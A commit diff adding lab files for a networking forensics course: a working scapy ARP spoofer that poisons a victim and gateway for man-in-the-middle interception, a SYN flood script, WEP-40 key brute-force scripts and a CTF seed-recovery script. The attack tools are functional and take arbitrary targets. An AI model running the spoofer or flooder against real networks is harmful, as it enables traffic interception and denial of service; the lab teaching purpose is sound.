preparing networking forensics labs, unfinished

Networking_Forensics/code/arp_spoofer.py

@@ -0,0 +1,93 @@
+# https://www.geeksforgeeks.org/python-how-to-create-an-arp-spoofer-using-scapy/
+# https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy
+
+import scapy.all as scapy
+import time
+import argparse
+import time
+import os
+import sys
+
+def get_mac(ip):
+	arp_request = scapy.ARP(pdst = ip)
+	broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff")
+	arp_request_broadcast = broadcast / arp_request
+	answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
+	return answered_list[0][1].hwsrc
+
+def spoof(target_ip, host_ip, verbose=True):
+    """
+    Kali tells `target_ip` saying that "I have the host_ip that you want to talk". 
+    However, Kali provides its own Mac address.
+    In target's arp:
+    Host IP, attacker's/Kali Mac address
+    """
+    packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip),
+															psrc = host_ip)
+    scapy.send(packet, verbose = False)
+    
+    if verbose:
+        # get the MAC address of the default interface we are using
+        self_mac = scapy.ARP().hwsrc
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
+
+
+def restore(destination_ip, source_ip):
+	destination_mac = get_mac(destination_ip)
+	source_mac = get_mac(source_ip)
+	packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)
+	scapy.send(packet, verbose = False)
+ 
+ 
+def _enable_linux_iproute():
+    """
+    Enables IP route ( IP Forward ) in linux-based distro
+    """
+    file_path = "/proc/sys/net/ipv4/ip_forward"
+    with open(file_path) as f:
+        if f.read() == 1:
+            # already enabled
+            return
+    with open(file_path, "w") as f:
+        print(1, file=f) 
+        
+   
+def enable_ip_route(verbose=True):
+    """
+    Enables IP forwarding
+    """
+    if verbose:
+        print("[!] Enabling IP Routing...")
+        _enable_linux_iproute()
+    if verbose:
+        print("[!] IP Routing enabled.")
+	
+if __name__ == "__main__":
+    # Get the command-line arguments
+    args = sys.argv
+    
+    # victim ip address
+    target = args[1]
+    # gateway ip address
+    host = args[2]
+    # print progress to the screen
+    verbose = True
+    # enable ip forwarding
+    enable_ip_route()
+    try:
+        sent_packets_count = 0
+        while True:
+            # telling the `target` that we are the `host`
+            spoof(target, host, verbose)
+            # telling the `host` that we are the `target`
+            spoof(host, target, verbose)
+            
+            sent_packets_count = sent_packets_count + 2
+            print("\r[*] Packets Sent "+str(sent_packets_count), end ="")
+            # sleep for two second
+            time.sleep(3)
+    except KeyboardInterrupt:
+        print("[!] Detected CTRL+C ! restoring the network, please wait...")
+        restore(target, host)
+        restore(host, target)
+        print("[+] Arp Spoof Stopped")

Networking_Forensics/lab_files/SYN_Flood/synflood.py

@@ -0,0 +1,11 @@
+from scapy.all import *
+
+def send_syn(target_ip_address, target_port, number_of_packets_to_send = 4, size_of_packet = 65000):
+	ip = IP(dst=target_ip_address)
+	tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
+	raw = Raw(b"X" * size_of_packet)
+	p = ip / tcp / raw
+	send(p, count=number_of_packets_to_send, verbose=0)
+	print('send_syn(): Sent ' + str(number_of_packets_to_send) + ' packets of '+ str(size_of_packet) + 'size to ' + target_ip_address + ' on port ' + str(target_port))
+
+send_syn(target_ip_address = "127.0.0.1", target_port= 80)

Networking_Forensics/lab_files/traffic/image.html

@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html>
+<body>
+
+<h1>My First Heading</h1>
+
+<p>My first paragraph.</p>
+
+<img src="building.jpg" alt="UB"/> 
+
+</body>
+</html>

Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py

@@ -0,0 +1,72 @@
+# Generated By ChatGPT DGL
+# Write Python code that generates all possible combinations of 8 characters, 
+# with each character consisting of either a lowercase or uppercase English letter and 
+# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, 
+# the XOR sum of the 1st, 4th, 7th characters, 
+# and the XOR sum of the 2nd and 5th characters. 
+# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac
+# Use Pytorch framework to use GPU
+
+import torch
+import string
+import hashlib
+import time
+import itertools
+
+
+def generate_combinations_test(device):
+    ascii_codes = [ord(char) for char in "cgwpkexz"]
+    return torch.tensor([ascii_codes], dtype=torch.uint8,  device=device)
+
+
+def generate_combinations(device):
+    characters = string.ascii_lowercase
+    combinations = torch.tensor([list(map(ord, chars)) for chars in itertools.product(
+        characters, repeat=8)], dtype=torch.uint8, device=device)
+    return combinations
+
+
+def check_xor_sum(combination):
+    xor_sum_0_3_6 = combination[:, 0].int(
+    ) ^ combination[:, 3].int() ^ combination[:, 6].int()
+    xor_sum_1_4_7 = combination[:, 1].int(
+    ) ^ combination[:, 4].int() ^ combination[:, 7].int()
+    xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int()
+    return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12)          
+
+def add_xy_and_check_sha1(valid_combinations, device):
+    letters = 'abcdefghijklmnopqrstuvwxyz'
+    xy_combinations = torch.tensor(
+        [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device)
+
+    final_results = []
+    for combination in valid_combinations:
+        for xy in xy_combinations:
+            new_combination = torch.cat((combination[:3], xy[0].unsqueeze(
+                0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0)
+            sha1_hash = hashlib.sha1(
+                new_combination.cpu().numpy().tobytes()).hexdigest()
+            if sha1_hash.startswith('ff7b948953ac'):
+                final_results.append(new_combination)
+    return final_results
+
+if torch.cuda.is_available():
+    device = torch.device("cuda")
+else:
+    device = torch.device("cpu")
+
+
+combinations = generate_combinations(device)
+num_combinations = combinations.shape[0]
+start_time = time.time()
+
+valid_combinations = combinations[check_xor_sum(combinations)]
+valid_combinations = add_xy_and_check_sha1(valid_combinations, device)
+if len(valid_combinations) > 0:
+    print(valid_combinations[0].char().cpu().numpy().tolist())
+else:
+    print("No valid combinations found")
+
+end_time = time.time()
+print("Processing took %.2f seconds for %d combinations" %
+      (end_time - start_time, num_combinations))

Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py

@@ -0,0 +1,76 @@
+# Generated By ChatGPT DGL
+# Write Python code that generates all possible combinations of 8 characters, 
+# with each character consisting of either a lowercase or uppercase English letter and 
+# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, 
+# the XOR sum of the 1st, 4th, 7th characters, 
+# and the XOR sum of the 2nd and 5th characters. 
+# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac
+# Use Pytorch framework to use GPU
+# Generated By ChatGPT DGL
+# Write Python code that generates all possible combinations of 8 characters, 
+# with each character consisting of either a lowercase or uppercase English letter and 
+# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, 
+# the XOR sum of the 1st, 4th, 7th characters, 
+# and the XOR sum of the 2nd and 5th characters. 
+# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac
+# Use Pytorch framework to use GPU
+
+import torch
+import string
+import hashlib
+import time
+import itertools
+
+
+def generate_combinations_test(device):
+    ascii_codes = [ord(char) for char in "cgwpkexz"]
+    return torch.tensor([ascii_codes], dtype=torch.uint8,  device=device)
+
+
+def check_xor_sum(combination):
+    xor_sum_0_3_6 = combination[:, 0].int(
+    ) ^ combination[:, 3].int() ^ combination[:, 6].int()
+    xor_sum_1_4_7 = combination[:, 1].int(
+    ) ^ combination[:, 4].int() ^ combination[:, 7].int()
+    xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int()
+    return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12)          
+
+def add_xy_and_check_sha1(valid_combinations, device):
+    letters = 'abcdefghijklmnopqrstuvwxyz'
+    xy_combinations = torch.tensor(
+        [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device)
+
+    final_results = []
+    for combination in valid_combinations:
+        for xy in xy_combinations:
+            new_combination = torch.cat((combination[:3], xy[0].unsqueeze(
+                0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0)
+            sha1_hash = hashlib.sha1(
+                new_combination.cpu().numpy().tobytes()).hexdigest()
+            if sha1_hash.startswith('ff7b948953ac'):
+                final_results.append(new_combination)
+    return final_results
+
+if torch.cuda.is_available():
+    device = torch.device("cuda")
+else:
+    device = torch.device("cpu")
+
+start_time = time.time()
+characters = string.ascii_lowercase
+valid_combinations=[]
+for e in torch.tensor([list(map(ord, chars)) for chars in itertools.product(
+    characters, repeat=8)], dtype=torch.uint8, device=device):
+        if check_xor_sum(e):
+            valid_combinations.append(e)
+            print(e)
+
+valid_combinations = add_xy_and_check_sha1(valid_combinations, device)
+if len(valid_combinations) > 0:
+    print(valid_combinations[0].char().cpu().numpy().tolist())
+else:
+    print("No valid combinations found")
+
+end_time = time.time()
+print("Processing took %.2f seconds for " %
+      (end_time - start_time))

Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py

@@ -0,0 +1,59 @@
+# Write Python code that generates all possible combinations of 8 characters, 
+# with each character is a lowercase English letter and also has a function, check_xor_sum, 
+# to check the XOR sum of the 0th, 3rd, 6th characters is 0x6b, the XOR sum of the 1st, 4th, 7th characters is 0x76, 
+# and the XOR sum of the 2nd and 5th characters is 0x12. If check_xor_sum returns true, 
+# remember these valid combinations. Then write a function to generate all combinations of two lower case characters, 
+# call x and y, insert x after 3rd position and insert y after 6th position of valid combinations. 
+# The resultant new combination is 10 characters long strings. 
+# Also add function to check sha1 hash of the 10-character strings starts with ff7b948953ac. Print final results.
+
+import hashlib
+import itertools
+
+def check_xor_sum(string):
+    if ord(string[0]) ^ ord(string[3]) ^ ord(string[6]) == 0x6b and \
+       ord(string[1]) ^ ord(string[4]) ^ ord(string[7]) == 0x76 and \
+       ord(string[2]) ^ ord(string[5]) == 0x12:
+        return True
+    return False
+
+def generate_8_char_combinations():
+    characters = 'abcdefghijklmnopqrstuvwxyz'
+    combinations = itertools.product(characters, repeat=8)
+    valid_combinations = []
+    for combination in combinations:
+        string = "".join(combination)
+        if check_xor_sum(string):
+            valid_combinations.append(string)
+    # valid_combinations = ["cgwpkexz"]
+    return valid_combinations
+
+def insert_letters(valid_combinations):
+    characters = 'abcdefghijklmnopqrstuvwxyz'
+    new_combinations = []
+    for x in characters:
+        for y in characters:
+            for valid_combination in valid_combinations:
+                new_combination = valid_combination[:3] + x + \
+                    valid_combination[3:6] + y + valid_combination[6:]
+                new_combinations.append(new_combination)
+    return new_combinations
+
+def check_sha1_hash(new_combinations):
+    final_results = []
+    for new_combination in new_combinations:
+        sha1_hash = hashlib.sha1(new_combination.encode('utf-8')).hexdigest()
+        if sha1_hash.startswith("ff7b948953ac"):
+            final_results.append(new_combination)
+    return final_results
+
+def main():
+    valid_combinations = generate_8_char_combinations()
+    new_combinations = insert_letters(valid_combinations)
+    final_results = check_sha1_hash(new_combinations)
+    print("Final results:")
+    for result in final_results:
+        print(result)
+
+if __name__ == '__main__':
+    main()

Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py

@@ -0,0 +1,55 @@
+import itertools
+import string
+import hashlib
+
+
+def generate_combinations():
+    characters = string.ascii_lowercase
+    combinations = itertools.product(characters, repeat=8)
+    # For testing only
+    # combinations = ["aaaaaaaa", "cgwpkexz", "cgwpkexa", "cgwpkexa", "cgwpkexa", "cgwpkexa"]
+    return combinations
+
+
+def check_xor_sum(combination):
+    if ord(combination[0]) ^ ord(
+        combination[3]) ^ ord(combination[6])  != 0x6b :
+        return False
+    if ord(combination[1]) ^ ord(
+        combination[4]) ^ ord(combination[7]) != 0x76:
+        return False
+    if ord(combination[2]) ^ ord(combination[5]) != 0x12:
+        return False
+    return True
+
+
+def insert_letters(valid_combination):
+    new_combinations = []
+    characters = 'abcdefghijklmnopqrstuvwxyz'
+    for x in characters:
+        for y in characters:
+            new_combination = tuple(list(valid_combination[:3]) + [x] +
+                                    list(valid_combination[3:6]) + [y] +
+                                    list(valid_combination[6:]))
+            new_combinations.append(new_combination)
+    return new_combinations
+
+def check_sha1_hash(combination):
+    combination_str = ''.join(combination)
+    sha1_hash = hashlib.sha1(combination_str.encode('utf-8'))
+    return sha1_hash.hexdigest().startswith('ff7b948953ac')
+
+
+cracked= False
+for combination in generate_combinations():
+    # print("process: ", ''.join(combination))
+    if check_xor_sum(combination): 
+        print("Match xor sum: ", ''.join(combination))
+        for comb_x_y in insert_letters(combination):
+            if check_sha1_hash(comb_x_y):
+                cracked = True
+                print("Cracked: ", ''.join(comb_x_y))
+                break
+        if cracked:
+            break
+

Networking_Forensics/lab_files/wlan_decrypt/findseed.py

@@ -0,0 +1,26 @@
+# https://www.vnsecurity.net/ctf%20-%20clgt%20crew/
+# 2015/03/16/codegate-good-crypto.html
+
+key=[0xa4,0x3d,0xf6,0xf3,0x74]
+a, c, m = 0x000343fd, 0x269ec3, 0xFFFFFF
+secret_key_bytes=5
+
+for seed in range(1<<24):
+    correct = True
+    x = seed
+    
+    for i in range(secret_key_bytes):
+        x = (a * x  + c) & m   
+        # shift 16 bits to right
+        # the same as check the second most significant byte 
+        if (x>>16)!=key[i]:
+            correct = False
+            break
+        
+    if correct:
+        print("Found it: ", hex(seed))
+        print("Verify: ")
+            
+        for i in range(secret_key_bytes):
+            seed = (a* seed + c) & m
+            print(hex(seed>>16),hex(seed))